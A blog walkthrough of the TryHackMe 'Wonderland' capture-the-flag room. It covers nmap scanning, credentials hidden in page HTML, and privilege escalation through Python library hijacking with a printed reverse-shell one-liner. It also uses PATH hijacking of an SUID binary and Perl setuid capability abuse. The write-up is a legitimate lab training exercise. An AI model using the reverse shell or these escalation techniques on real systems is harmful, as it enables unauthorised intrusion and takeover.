C R E A T E & D E S T R OY

Wonderland | TryHackMe

Fall down the rabbit hole and enter wonderland. Medium difficulty.

nmap -sC -sV -T4 -oN initial.nmap                                            
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-15 19:29 BST
Nmap scan report for 
Host is up (0.068s latency).                                      
Not shown: 998 closed tcp ports (conn-refused)    
PORT   STATE SERVICE VERSION                                      
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.10 seconds

Starting with enumeration there’s nothing much to see. On to the web app.

Dirbusting quickly leads to this page, and a folder with some images. I run them through steghide and binwalk to see if there’s anything hidden inside but don’t find anything.

Further directory enumeration ends up at

Hidden in the HTML there’s our first set of creds.

<!DOCTYPE html>

    <title>Enter wonderland</title>
    <link rel="stylesheet" type="text/css" href="/main.css">

    <h1>Open the door and enter wonderland</h1>
    <p>"Oh, you're sure to do that," said the Cat, "if you only walk long enough."</p>
    <p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
    <p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
        the other paw, "lives a March Hare. Visit either you like: they're both mad."</p>
    <p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
    <img src="/img/alice_door.png" style="height: 50rem;">


(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

Now logged in as Alice there’s potential privesc vector sudo -l.

The script imports random, and is inside Alice’s home directory so there’s potential library hijacking if we put a malicious reverse shell in random.py.

import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

Now in Rabbit’s home directory we’ve a binary (teaParty) that’s an SUID. There’s nothing to view the binary with on the server so downloading to attacking machine shows the use of a relative path that we might be able to exploit to gain another shell…

Welcome to the tea party!                                       
The Mad Hatter will be here soon.  
/bin/echo -n 'Probably by ' && date --date='next hour' -RAsk very nicely, and I will give you some tea while you wait for him Segmentation fault (core dumped)   

Changing the path of date…

rabbit@wonderland:/home/rabbit$ export PATH=$(pwd):$PATH
export PATH=$(pwd):$PATH
rabbit@wonderland:/home/rabbit$ which date
which date
Shell as Hatter

Inside Hatter’s home directory is password.txt containing WhyIsARavenLikeAWritingDesk? which means I can kill all the shells and continue as Hatter.

There’s nothing immediately obvious in Hatter’s home folder so it’s time to do some basic enumeration and discover Perl with setuid capabilities.

hatter@wonderland:/$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

So with a bit of help from GTFO bins can escalate to root and grab root.txt in Alice’s home folder then top into the root folder for the user.txt.

The initial enumeration through the Web app was silly but I enjoyed this room, relative path abuse and Lewis Caroll quotes. I got stuck in the rabbit hole of looking for steganography early on but thankfully there wasn’t any.

Leave a Reply

Your email address will not be published. Required fields are marked *